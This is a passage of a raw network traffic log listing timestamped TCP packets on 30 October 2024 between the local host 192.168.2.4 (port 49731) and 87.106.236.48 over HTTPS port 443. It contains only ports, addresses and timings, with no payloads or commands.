Oct 30, 2024 19:47:17.578888893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.578907967 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.579288006 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.579303980 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.579346895 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.579354048 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.579369068 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.579387903 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.580586910 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.580600977 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.580646992 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.580653906 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.580677986 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.580693007 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.581192017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.581207991 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.581254959 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.581262112 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.581284046 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.581307888 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.601053953 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.601069927 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.601119995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.601130009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.601284027 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.601284027 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.601821899 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.601839066 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.601886988 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.601893902 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.601922035 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.601942062 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.602473974 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.602489948 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.602535963 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.602544069 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.602566957 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.602581024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.639923096 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.639940023 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.639988899 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.639996052 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.640149117 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.640149117 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.700537920 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.700556040 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.700727940 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.700740099 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.700784922 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.701396942 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.701411963 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.701462030 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.701469898 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.701508045 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.702007055 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.702020884 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.702075005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.702081919 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.702116966 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.702625990 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.702641964 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.702687979 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.702694893 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.702730894 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.703092098 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.703105927 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.703146935 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.703154087 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.703181982 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.703193903 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.704046011 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.704061985 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.704113960 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.704122066 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.704160929 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.704809904 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.704824924 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.704876900 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.704883099 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.704920053 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.724499941 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.724519014 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.724565983 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.724576950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.724713087 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.724713087 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.725286961 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.725301981 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.725347996 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.725357056 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.725378036 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.725397110 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.725986004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.726001024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.726056099 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.726063967 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.726102114 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.763150930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.763168097 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.763282061 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.763293028 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.763447046 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.825440884 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.825460911 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.825644016 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.825659037 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.825701952 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.825922966 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.825938940 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.825992107 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.825998068 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.826034069 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.826600075 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.826612949 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.826656103 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.826662064 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.826689005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.826702118 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.827578068 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.827593088 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.827662945 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.827671051 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.827713013 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.827878952 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.827892065 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.827929974 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.827935934 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.827963114 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.827975035 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.828509092 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.828522921 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.828581095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.828588009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.828600883 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.828619003 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.828624010 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.828632116 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.828655958 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.828697920 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.831383944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.831403017 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.831461906 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.831470013 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.831511021 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.848469973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.848489046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.848567963 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.848579884 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.848716974 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.849497080 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.849509954 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.849570036 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.849580050 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.849618912 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.849663973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.849678040 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.849730968 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.849737883 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.849781990 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.887428999 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.887444973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.887520075 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.887530088 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.887571096 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.948684931 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.948700905 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.948771954 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.948800087 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.948839903 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.950021982 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.950037003 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.950098991 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.950112104 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.950158119 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.950916052 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.950931072 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.950974941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.950982094 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.951011896 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.951026917 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.951138973 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.951153994 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.951198101 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.951205015 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.951229095 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.951245070 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.951407909 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.951421976 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.951467037 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.951472998 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.951500893 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.951586008 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.952174902 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.952191114 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.952224970 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.952231884 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.952255964 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.952275038 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.952959061 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.952971935 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.953013897 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.953021049 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.953044891 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.953058004 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.953879118 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.953895092 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.953936100 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.953943014 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.953963995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.953995943 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.976939917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.976974010 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.977025986 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.977035999 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.977077007 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.977200985 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.977219105 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.977247000 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.977252007 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.977273941 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.977305889 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.978178024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.978198051 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.978244066 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.978249073 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:17.978285074 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:17.978291988 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.010469913 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.010500908 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.010546923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.010566950 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.010590076 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.010624886 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.054847956 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.054868937 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.054928064 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.054938078 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.054980993 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.071389914 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.071409941 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.071449995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.071456909 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.071486950 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.071506023 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.072036982 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.072057009 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.072088957 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.072094917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.072122097 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.072140932 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.072923899 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.072943926 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.072979927 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.072985888 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.073014021 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.073035002 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.073714018 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.073733091 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.073766947 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.073774099 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.073802948 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.073811054 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.074335098 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.074354887 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.074383974 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.074389935 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.074419975 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.074434996 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.075016975 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.075037956 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.075073004 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.075078964 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.075109005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.075637102 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.075656891 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.075685024 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.075690985 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.075721025 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.075740099 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.076317072 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.076349020 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.076375961 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.076381922 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.076411009 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.076436043 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.095180035 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.095201969 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.095246077 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.095253944 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.095287085 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.095305920 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.095910072 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.095937967 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.095969915 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.095977068 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.096004009 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.096020937 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.096698046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.096719980 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.096754074 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.096760035 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.096790075 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.096807957 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.134383917 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.134407997 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.134449005 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.134458065 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.134493113 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.134501934 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.135649920 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.135673046 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.135708094 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.135715008 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.135740995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.135759115 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.214730024 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.214755058 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.214797020 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.214809895 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.214823961 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.214845896 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.215554953 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.215575933 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.215619087 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.215626955 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.215653896 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.215673923 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.215698004 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.216161966 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.216180086 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.216217995 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.216223955 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.216244936 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.216247082 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.216275930 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.216275930 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.216295004 CET	443	49731	87.106.236.48	192.168.2.4
Oct 30, 2024 19:47:18.216310978 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.216345072 CET	49731	443	192.168.2.4	87.106.236.48
Oct 30, 2024 19:47:18.220136881 CET	443	49731	87.106.236.48	192.168.2.4
